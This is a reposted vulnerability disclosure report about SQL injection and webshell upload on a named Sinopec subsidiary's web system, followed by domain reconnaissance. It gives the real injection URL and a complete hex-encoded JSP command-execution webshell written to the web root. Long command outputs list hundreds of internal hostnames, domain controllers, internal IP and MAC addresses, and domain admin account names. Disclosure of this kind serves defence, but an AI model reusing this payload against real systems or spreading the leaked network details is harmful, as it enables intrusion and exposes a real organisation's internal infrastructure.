HQ26-038$ HQ26-039$ HQ26-040$
HQ26-041$ HQ26-042$ HQ26-043$
HQ26-045$ HQ26-046$ HQ26-047$
HQ26-048$ HQ26-050$ HQ26-051$
HQ26-052$ HQ26-054$ HQ26-40$
HQ26-DINGJC$ HQ26-GUMF$ HQ26-GUOCJ$
HQ26-LIMINGHUI$ HQ26-LINGYAN$ HQ26-LIUJY$
HQ26-LIWEI03$ HQ26-LIYING$ HQ26-MACAN$
HQ26-MENGXQ$ HQ26-TANNN$ HQ26-WANGXIN$
HQ26-YANGJR$ HQ26-YUQUN$ HQ26-ZHANGKP$
HQ27-001$ HQ27-002$ HQ27-003$
HQ27-004$ HQ27-005$ HQ27-007$
HQ27-009$ HQ27-010$ HQ27-011$
HQ27-014$ HQ27-016$ HQ27-017$
HQ27-018$ HQ27-019$ HQ27-020$
HQ27-021$ HQ27-023$ HQ27-024$
HQ27-026$ HQ27-027$ HQ27-028$
HQ27-029$ HQ27-030$ HQ27-033$
HQ27-035$ HQ27-037$ HQ27-038$
HQ27-039$ HQ27-042$ HQ27-043$
HQ27-045$ HQ27-046$ HQ27-047$
HQ27-048$ HQ27-049$ HQ27-050$
HQ27-051$ HQ27-052$ HQ27-053$
HQ27-054$ HQ27-057$ HQ27-058$
HQ27-059$ HQ27-060$ HQ27-061$
HQ27-062$ HQ27-063$ HQ27-064$
HQ27-065$ HQ27-066$ HQ27-067$
HQ27-068$ HQ27-070$ HQ27-071$
HQ27-072$ HQ27-073$ HQ27-074$
HQ27-075$ HQ27-076$ HQ27-077$
HQ27-078$ HQ27-079$ HQ27-080$
HQ27-081$ HQ27-081-NB$ HQ27-082$
HQ27-083$ HQ27-084$ HQ27-085$
HQ27-086$ HQ27-088$ HQ27-089$
HQ27-090$ HQ27-091$ HQ27-092$
HQ27-093$ HQ27-094$ HQ27-095$
HQ27-096$ HQ27-50$ HQ27-CHENYONG03$
HQ27-CHENYUE01$ HQ27-GONGXUE$ HQ27-JIANGTAO$
HQ27-KANGZN$ HQ27-LIJY$ HQ27-LIUPENG01$
HQ27-LIUWM$ HQ27-LIUYFANG$ HQ27-LIYW$
HQ27-LUYJ$ HQ27-MALL$ HQ27-MAOHQ$
HQ27-PANYAN$ HQ27-SHENJUAN$ HQ27-SHIQING$
HQ27-WANGCHUAN$ HQ27-WANGCHUN$ HQ27-WANGXLEI$
HQ27-XUMING$ HQ27-XUXP$ HQ27-YUANYAN$
HQ27-YUJW$ HQ27-ZHAIXY$ HQ27-ZHANGCHAO$
HQ27-ZHANGCQIN$ HQ27-ZHANGMAI$ HQ27-ZHAOHENG$
HQ27-ZHOUWY$ HQ27-ZHUJUN$ HQ28-002$
HQ28-003$ HQ28-004$ HQ28-005$
HQ28-006$ HQ28-007$ HQ28-009$
HQ28-010$ HQ28-011$ HQ28-013$
HQ28-014$ HQ28-015$ HQ28-016$
HQ28-018$ HQ28-021$ HQ28-022$
HQ28-024$ HQ28-026$ HQ28-027$
HQ28-029$ HQ28-030$ HQ28-033$
HQ28-034$ HQ28-037$ HQ28-039$
HQ28-040$ HQ28-043$ HQ28-044$
HQ28-046$ HQ28-047$ HQ28-048$
HQ28-049$ HQ28-052$ HQ28-053$
HQ28-054$ HQ28-055$ HQ28-056$
HQ28-058$ HQ28-059$ HQ28-061$
HQ28-064$ HQ28-066$ HQ28-068$
HQ28-069$ HQ28-072$ HQ28-073$
HQ28-074$ HQ28-075$ HQ28-076$
HQ28-077$ HQ28-078$ HQ28-080$
HQ28-082$ HQ28-083$ HQ28-084$
HQ28-085$ HQ28-086$ HQ28-087$
HQ28-088$ HQ28-091$ HQ28-900$
HQ28-999$ HQ28-CHENJUN02$ HQ28-CHENQIAN$
HQ28-DINGSUIKUN$ HQ28-GAOYD$ HQ28-HUXB$
HQ28-JINXIN$ HQ28-LIANGZH$ HQ28-LICHUNWEI$
HQ28-LIJZHONG$ HQ28-LINYANG$ HQ28-LIUJLIANG$
HQ28-LIUPAN$ HQ28-LUYG$ HQ28-MAJC$
HQ28-MAOXQ01$ HQ28-SUNLW$ HQ28-SUNXIAORON$
HQ28-SUNXR$ HQ28-TANMING$ HQ28-TANXIAO$
HQ28-TAOLAN$ HQ28-WANGGL$ HQ28-WANGHL$
HQ28-WANGKFEI$ HQ28-XUCHUNYAN$ HQ28-XUHONGCHAN$
HQ28-YANGAH$ HQ28-YANGZHEN$ HQ28-YAOYAO$
HQ28-YEHF$ HQ28-YEHR$ HQ28-ZHANGYOU$
HQ28-ZHANGYXIN$ HQ28-ZHANGZHAO$ HQ28-ZHUYI$
HQ28-ZONGDL$ HQ29-002$ HQ29-003$
HQ29-004$ HQ29-005$ HQ29-006$
HQ29-007$ HQ29-008$ HQ29-009$
HQ29-010$ HQ29-011$ HQ29-013$
HQ29-014$ HQ29-015$ HQ29-016$
HQ29-018$ HQ29-018LS$ HQ29-019$
HQ29-020$ HQ29-021$ HQ29-022$
HQ29-024$ HQ29-025$ HQ29-026$
HQ29-028$ HQ29-029$ HQ29-030$
HQ29-031$ HQ29-032$ HQ29-033$
HQ29-034$ HQ29-036$ HQ29-038$
HQ29-040$ HQ29-041$ HQ29-042$
HQ29-043$ HQ29-044$ HQ29-045$
HQ29-047$ HQ29-050$ HQ29-051$
HQ29-052$ HQ29-053$ HQ29-054$
HQ29-055$ HQ29-056$ HQ29-057$
HQ29-058$ HQ29-059$ HQ29-060$
HQ29-061$ HQ29-49$ HQ29-50$
HQ29-CHENFEI01$ HQ29-DINGYUE$ HQ29-GUOCHONG$
HQ29-GUOFAN$ HQ29-MAOJIAN$ HQ29-PANRUI$
HQ29-SUNJIN$ HQ29-WANGCONG01$ HQ29-WANGQJ$
HQ29-ZHANGXT$ HQ29-ZHOUYAN$ HQ31-001$
HQ31-002$ HQ31-003$ HQ31-005$
HQ31-006$ HQ31-007$ HQ31-008$
HQ31-010$ HQ31-012$ HQ31-015$
HQ31-018$ HQ31-019$ HQ31-020$
HQ31-030$ HQ31-LIQW$ HQ31-LIZL$
HQ31-QIANYI$ HQ31-TANQY$ HQ31-ZHANGXL$
HQ32-001$ HQ32-002$ HQ32-003$
HQ32-005$ HQ32-006$ HQ32-007$
HQ32-008$ HQ32-010$ HQ32-011$
HQ32-013$ HQ32-014$ HQ32-015$
HQ32-016$ HQ32-017$ HQ32-019$
HQ32-021$ HQ32-023$ HQ32-024$
HQ32-025$ HQ32-026$ HQ32-027$
HQ32-028$ HQ32-029$ HQ32-032$
HQ32-033$ HQ32-035$ HQ32-036$
HQ32-037$ HQ32-038$ HQ32-039$
HQ32-040$ HQ32-042$ HQ32-044$
HQ32-045$ HQ32-046$ HQ32-047$
HQ32-048$ HQ32-12$ HQ32-HUANLH$
HQ33-001$ HQ33-003-1$ HQ33-004$
HQ33-013$ HQ33-015$ HQ33-016$
HQ33-017$ HQ33-XUGB$ HQ34-002$
HQ35-003$ HQ36-001$ HQ36-003$
HQ36-005$ HQ36-006$ HQ36-007$
HQ36-012$ HQ36-WUXIA$ HQ36-YINMY$
HQ36-YUANXJIN$ HQ37-001$ HQ37-003$
HQ37-005$ HQ37-010$ HQ37-011$
HQ37-012$ HQ37-014$ HQ37-015$
HQ37-016$ HQ37-017$ HQ37-017-2$
HQ37-018$ HQ37-084$ HQ37-085$
HQ37-CHENYONG$ HQ37-JIANGSJ$ HQ37-XUTAO$
HQ37-ZHANGGANG$ HQ37-ZHANGYGUAN$ HQ37-ZHOUWEIHON$
HQ42-HUXD$ HQ42-ZHANGHAO$ HQ42-ZHANGZJ$
HQ43-DENGYB$ HQ43-YUANQIONG$ HQ43-ZHANGHONG$
HQ44-SIWT$ HQ45-SHAOYUANYU$ HQ46-1468706$
HQ46-DUYANG$ HQ46-GUOJX$ HQ46-GUXUAN$
HQ46-LIUWJ$ HQ46-LIYIF$ HQ46-MAXC$
HQ46-WANGCJ$ HQ46-WANGLH$ HQ47-CAIGOU$
HQ47-CAOYJ$ HQ47-CHENYUWEI$ HQ47-CUIYUAN$
HQ47-DONGBC$ HQ47-DONGJX$ HQ47-GUOJC$
HQ47-GUOZJ$ HQ47-HEGQ$ HQ47-HEQI$
HQ47-HUANGLY$ HQ47-JIANGHAIHA$ HQ47-JIANGHH$
HQ47-LIBO$ HQ47-LIJUN01$ HQ47-LILL$
HQ47-LIQING$ HQ47-LIUHH$ HQ47-MAMH$
HQ47-NIUCHEN$ HQ47-PANDM$ HQ47-SHILIN$
HQ47-SONGPING$ HQ47-SUNYU$ HQ47-SUSQ$
HQ47-WANGFLI$ HQ47-WANGHY$ HQ47-WANGXYING$
HQ47-WANGYUE$ HQ47-WANGYW$ HQ47-XIAJUN$
HQ47-XINGZHENG$ HQ47-XUXIAO$ HQ47-XUYUN$
HQ47-YANGPENG$ HQ47-YUSX$ HQ47-YUYANG$
HQ47-ZHANGFAN$ HQ47-ZHANGXIJUA$ HQ47-ZHANGXLING$
HQ47-ZHAOCC$ HQ47-ZHAOHUA$ HQ47-ZHAOHX$
HQ47-ZHENGWEI$ HQ47-ZHOUKG$ HQ47-ZHOUSN$
HQ47-ZHOUXIONGW$ HQ47-ZHOUXX$ HQ48-CAOZHENHUA$
HQ48-CHENCHENG0$ HQ48-CHENCHUNHA$ HQ48-DOUZY$
HQ48-HANSJ$ HQ48-HUJIAJIA$ HQ48-LIFENG$
HQ48-LIUJJ$ HQ48-LVJL$ HQ48-MENFANG$
HQ48-TANDZ-1$ HQ48-TANDZ-2$ HQ48-WANGSHAOC$
HQ48-WEITK$ HQ48-ZHAOXL-1$ HQ48-ZHAOXL-2$
HQ48-ZHUWEI01$ HQ49-CAIJY$ HQ49-CHENXIYANG$
HQ49-CHENZJ$ HQ49-DINGMQ$ HQ49-GAOXC$
HQ49-GUYB$ HQ49-HUANGBING$ HQ49-HUANGGX$
HQ49-HUANGJS$ HQ49-JUFK$ HQ49-LUOMQ$
HQ49-MEIGC$ HQ49-QIUKY$ HQ49-QUANFENG$
HQ49-SHIYQ$ HQ49-SUNMY$ HQ49-SURONG$
HQ49-WANGCY$ HQ49-WANGYG$ HQ49-XUWQ$
HQ49-YANGFAN$ HQ49-YANGJI$ HQ49-YEZB$
HQ49-YIQP$ HQ49-YUNP$ HQ49-ZHANGGZ$
HQ49-ZHAOXF$ HQ49-ZHENGXF$ HQ49-ZHOUWEIHON$
HQ49-ZHULIQIONG$ HQ49-ZHULQ$ HQ51-PID3$
HQ51-WEIQING$ HQ51-YWQ$ HR-530$
HR-NB-01$ HR-NB-02$ HSE-SHARE$
HUAZQ-NB$ HUBEI02$ HUIYI105$
HUIYI-107$ HUIYI109$ HUIYI-110$
HUIYI-111$ HUYUANZHEN-NB$ HYS-106$
ISASVR1$ IT-001$ IT-002$
IT-003$ IT-004$ IT-005$
IT-006$ JIANG-PC$ JMSVR$
JSSYFGS-006$ JSSYFGS009$ JSSYFGS012$
JSSYFGS014$ JSSYFGS015$ JSSYFGS020$
JSSYFGS07$ JSSYFGS-14$ JXHGCFGS001$
JXHGCFGS003$ JXHGCFGS004$ JXHGCFGS006$
JXHGCFGS007$ JXHGCFGS008$ JXHGCFGS009$
JXHGCFGS010$ JXHGCFGS011$ JXHGCFGS012$
JXHGCFGS013$ JXHGCFGS014$ JXHGCFGS016$
JXHGCFGS017$ JXHGCFGS018$ JXHGCFGS019$
JXHGCFGS020$ JXHGCFGS021$ JXHGCFGS024$
JXHGCFGS025$ JXHGCFGS026$ JXHGCFGS027$
JXHGCFGS028$ JXHGCFGS038$ JXHGCFGS047$
JXHGCFGS048$ JXHGCFGS061$ JXHGCFGS065$
JXHGCFGS066$ JXHGCFGS300$ JXHGCFGS301$
JXHGCFGS302$ JXHGCFGS303$ JXHGCFGS304$
JXHGCFGS305$ JXHGCFGS306$ JXHGCFGS307$
JXHGCFGS308$ JXHGCFGS309$ JXHGCFGS310$
JXHGCFGS311$ JXHGCFGS312$ JXHGCFGS313$
JXHGCFGS314$ JXHGCFGS315$ JXHGCFGS316$
JXHGCFGS350$ JXHGCFGS351$ JXHGCFGS352$
KMSJFGS01$ KMSJFGS02$ L10-35$
LENOVO-PC$ LINXP-NB$ LIUJIAN01LS$
LIULIANFENG-NB$ LIUSHENG-NB$ LIUYG-NB$
LIUYG-NBLS$ LIUYH$ LIYL-NBLS$
LIZHIHAI-NB$ LLBJB-01$ LLBJB-02$
LLBJB-03$ LUOHESHENLS$ LUYING-LSNB$
MAILSERVER$ MAILSERVER1$ MAILSVR1$
MAOZW-NB$ MAOZW-PC$ MAQING$
M-PC$ MS-20150708BWJV$ NB-CHENCG$
NB-DONGQUN$ NB-HQ06$ NB-HQ15-080$
NB-JIANGNING$ NB-LIAX$ NB-LIJG$
NB-LIXIAN$ NB-LUZY$ NB-RENXQ$
NB-TAOHONG$ NB-WANGXN$ NB-YANJIE$
NB-ZHUYI$ NDA-DT39$ NDA-DT48$
NDA-DT51$ NDA-DT52$ NDA-DT53$
NDA-DT54$ NDA-DT55$ NDA-DT56$
NDA-DT57$ NDA-DT59$ NDA-DT60$
NDA-DT61$ NDA-DT62$ NDA-DT63$
NDA-DT64$ NDA-DT65$ NDA-DT67$
NDA-DT68$ NDA-DT69$ NDA-DT70$
NDA-DT71$ NDA-DT72$ NDA-DT73$
NDA-DT74$ NDA-DT75$ NDA-DT76$
NDA-DT77$ NDA-DT78$ NDA-DT79$
NDA-DT80$ NDA-DT81$ NDA-DT82$
NDA-DT83$ NDA-DT84$ NDA-DT85$
NDA-DT86$ NDA-DT87$ NDA-DT88$
NDA-DT89$ NDA-DT90$ NDA-DT91$
NDA-DT92$ NDA-DT93$ NDA-DT94$
NDA-DT95$ NDA-SR01$ NDA-SR02$
NDA-SR03$ NDA-SR04$ NDA-SR05$
NDA-SR06$ NJGC-001$ NJGC-002$
NJGC-004$ NJGC-005$ NJGC-006$
NJGC-A01$ NJGC-A02$ NJGC-A03$
NJGC-A04$ NJGC-A05$ NJGC-A06$
NJGC-A07$ NJGC-A08$ NJGC-A09$
NJGC-A10$ NJGC-B01$ NJGC-B02$
NJGC-B03$ NJGC-B04$ NJGC-B05$
NJGC-B06$ NJGC-B07$ NJGC-B08$
NJGC-B09$ NJGC-B10$ NJGCCLU01$
NJGC-D01$ NJGC-D02$ NJGC-D03$
NJGC-D04$ NJGC-D05$ NJGC-D06$
NJGC-D07$ NJGC-D08$ NJGC-D09$
NJGC-D10$ NJGC-DDC01$ NJGC-DDC02$
NJGC-DHCP$ NJGC-E01$ NJGC-E02$
NJGC-E03$ NJGC-E04$ NJGC-E05$
NJGC-LIC$ NJGC-PVS01$ NJGC-PVS02$
NJGC-SCVMM01$ NJGC-SF01$ NJGC-SF02$
NJGC-SQL01$ NJGC-SQL02$ OASERVER$
ORACLE-01$ ORALER-01$ P3SVR1$
PC--20120806YHI$ PC-20150308HJCT$ PDS-0714$
PDS-0718$ PDS121$ PDS122$
PDS123$ PDS124$ PDS125$
PDS208-137$ PDS2110$ PDS-CHENMIN$
PDSSVR1$ PDSSVR2$ PDSSVR3$
PDSSVR41$ PDSWKS001$ PDSWKS002$
PDSWKS003$ PDSWKS004$ PDSWKS005$
PDSWKS006$ PDSWKS008$ PDSWKS009$
PDSWKS018$ PDSWKS104$ PDSWKS105$
PDSWKS106$ PDSWKS107$ PDSWKS108$
PDSWKS109$ PDS-WKS113$ PDSWKS117$
PDSWKS177$ PDSWKS178$ PDSWKS179$
PDWKS001$ PDWKS002$ PIDSVR01$
PLACH$ PMIS1$ PMIS2$
PVSSTORE$ QIANJY-NB$ QIANXIN-NB$
QINING-NB$ QINJHLS$ QIUJINLONG-NB$
REN-NB01$ RENQSBJB$ SAUDISERVER$
SBFGS024-NB$ SBGCFGS$ SBGCFGS001$
SBGCFGS005$ SBGCFGS006$ SBGCFGS007$
SBGCFGS008$ SBGCFGS010$ SBGCFGS013$
SBGCFGS014$ SBGCFGS015$ SBGCFGS016$
SBGCFGS017$ SBGCFGS018$ SBGCFGS019$
SBGCFGS020$ SBGCFGS021$ SBGCFGS022$
SBGCFGS025$ SBGCFGS026$ SBGCFGS027$
SBGCFGS028$ SBGCFGS029$ SBGCFGS030$
SBGCFGS048$ SBGCFGS057$ SBGCFGS064$
SBGCFGS069$ SBGCFGS076$ SBGCFGS086$
SBGCFGS118$ SBGCFGS119$ SBGCFGS120$
SBGCFGS121$ SBGCFGS122$ SBGCFGS300$
SBGCFGS301$ SBGCFGS302$ SBGCFGS303$
SBGCFGS304$ SBGCFGS305$ SBGCFGS306$
SBGCFGS307$ SCC-14ED70404CB$ SCGS02$
SCGS03$ SDWM-20130326QC$ SEGS01$
SERVER3D$ SERVER-PPCS1$ SHANGYF-NBLS$
SHAOSHUYAN-NB$ SHARE-ZLB$ SIWT$
SJGLB-GX$ SKY-20140911NLZ$ SMTPSERVER$
SNB-1466791$ SNDI-94$ SNEI-65676EF84D$
SNEI-DCTM-CS1$ SNEI-DCTM-CS2$ SNEI-DCTM-CS3$
SNEI-DCTM-CS4$ SNEI-DCTM-CS5$ SNEI-DCTM-CS6$
SNEI-DCTM-DB1$ SNEI-DCTM-IDX1$ SNEI-DCTM-IDX2$
SNEI-DCTM-IDX3$ SNEI-DCTM-WEB1$ SNEI-DCTM-WEB2$
SNEI-DCTM-WEB3$ SNEI-DESIGN$ SNEI-FTP-SVR02$
SNEI-FUJIAN$ SNEI-GCXMGL$ SNEI-P6R8$
SNEISP3D$ SNEISP3D01$ SNEISP3D02$
SNEISP3D03$ SNEISP3D04$ SNEI-VIRTUAL01$
SNEI-VIRTUAL02$ SNEI-VIRTUAL03$ SNEI-VMM$
SOFTLICSVR1$ SOFTLICSVR3$ SOFTLICSVR5$
SONGHL-NBLS$ SONY-PC$ SP3DSVR1$
SP3DSVR2$ SP3DSVR3$ SP3DSVR5$
SPFAPP$ SPISQL01$ sql-alon1$
sql-wsfc1$ SRV-DOMINO1$ SUMMER1$
SUNXIAORONGLS$ SUOPENG-NB$ TEST001$
test002$ TESTIT$ TESTPC$
V2SVR1$ VDI-TEST$ virtual-cluster$
VIRTUAL-SVR01$ VIRTUAL-SVR02$ VIRTUAL-SVR03$
WANGAMLS$ WANGBIN-NBLS$ WANGBIN-PC$
WANGCJ-NB$ WANGDONGGANG-NB$ WANGHMLS$
WANGLYLS$ WANGMIN-NB$ WANGSX$
WANGSY-NB$ WANGXHUI-TEST$ WANGXIAOH-NBLS$
WANGXMING-NBLS$ WANGXS-NB$ WANGYZ-NB$
WDB-NB$ WEBBER-PC$ WEIQING$
WINDOWS7-CTX-PC$ WUWEIJUN-NB$ XENDDC$
XINGCHEN-NBLS$ XMB-FUJ001$ XUXIANLS$
YANTL-NB$ YAODIANX-NBLS$ YAODX-NB$
YAOZHIGANG-BJB$ YAOZHIPING-NBLS$ YINGCHUNLS$
YINGJW$ YWGK02$ ZHAIZLLS$
ZHANGFENGLS$ ZHANGFQ-NBLS$ ZHANGJIE-NBLS$
ZHANGLC-NB$ ZHANGLIKE-PC$ ZHANGLONG-NBLS$
ZHANGYU-NBLS$ ZHANGZHIJIA-NB$ ZHANGZJ-NB$
ZHAOBJLS$ ZHOUCHENLS$ ZHOUDONGLS$
ZHOUWEI01-NBLS$ ZHUST$ ZONGCL$
命令成功完成。





域用户就不列了



上个脚本把本网段的web服务跑一跑

62.png





看看域控

<code>C:\> net group "domain controllers" /domain

这项请求将在域 snei.com.cn 的域控制器处理。



组名 Domain Controllers

注释 域中所有域控制器



成员



-------------------------------------------------------------------------------

DCSVR1$ DCSVR2$ DCSVR3$

SNEI-FUJIAN2$ SNEI-NB-DC1$

命令成功完成。







C:\> ping SNEI-FUJIAN2



正在 Ping SNEI-FUJIAN2.snei.com.cn [10.150.228.12] 具有 32 字节的数据:

来自 10.150.228.12 的回复: 字节=32 时间=31ms TTL=125

来自 10.150.228.12 的回

漏洞证明:

注入点:http://v2.snei.com.cn//Conf/jsp/systembulletin/bulletinAction.dooperator=details



post



sysid=-1 union 注入



利用该注入直接写入shell



ysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23



上个菜刀马 index_cd.jsp



63.png





看下是不是在域里

code 区域
C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> ipconfig /all

Windows IP 配置

主机名 . . . . . . . . . . . . . : v2svr1
主 DNS 后缀 . . . . . . . . . . . : snei.com.cn
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : snei.com.cn

以太网适配器 本地连接 4:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-D0
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接 3:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CF
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接 2:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . : snei.com.cn
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CD
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CE
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::296e:f2cc:6642:2235%11(首选)
IPv4 地址 . . . . . . . . . . . . : 10.150.1.48(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.150.1.250
DHCPv6 IAID . . . . . . . . . . . : 248819282
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1E-AA-0F-DD-D4-AE-52-9D-E3-CE
DNS 服务器 . . . . . . . . . . . : 10.150.1.30
TCPIP 上的 NetBIOS . . . . . . . : 已启用

隧道适配器 isatap.{18F0418B-44BA-4EB7-BD31-A8BF6B32DD99}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{07D98EBF-A6F2-46EC-9899-12F2CEA8CB4A}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.snei.com.cn:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{D56D1E3E-BAA0-49D7-8060-AC6FE8375B0E}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 Teredo Tunneling Pseudo-Interface:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是





domain:snei.com.cn



看下域管理员组



code 区域
C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain admins" /domain
这项请求将在域 snei.com.cn 的域控制器处理。

组名 Domain Admins
注释 指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator chujing dnsmgmt
fsvr gcxmdns huangjk
NJGC-VMM-Admin snei-jm snei-virtual
snei-xxgl01 wangjian07 zhust
命令成功完成。



修复方案:

问题太多,先把web系统升级把注入堵上吧

版权声明:转载请注明来源 obanions@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-09 11:08

厂商回复:

谢谢!我们会尽快修复。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:中国石化某直属单位某系统SQL注入/getshell/域网几千台主机沦陷 - https://www.15qq.cn/wooyun/484.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知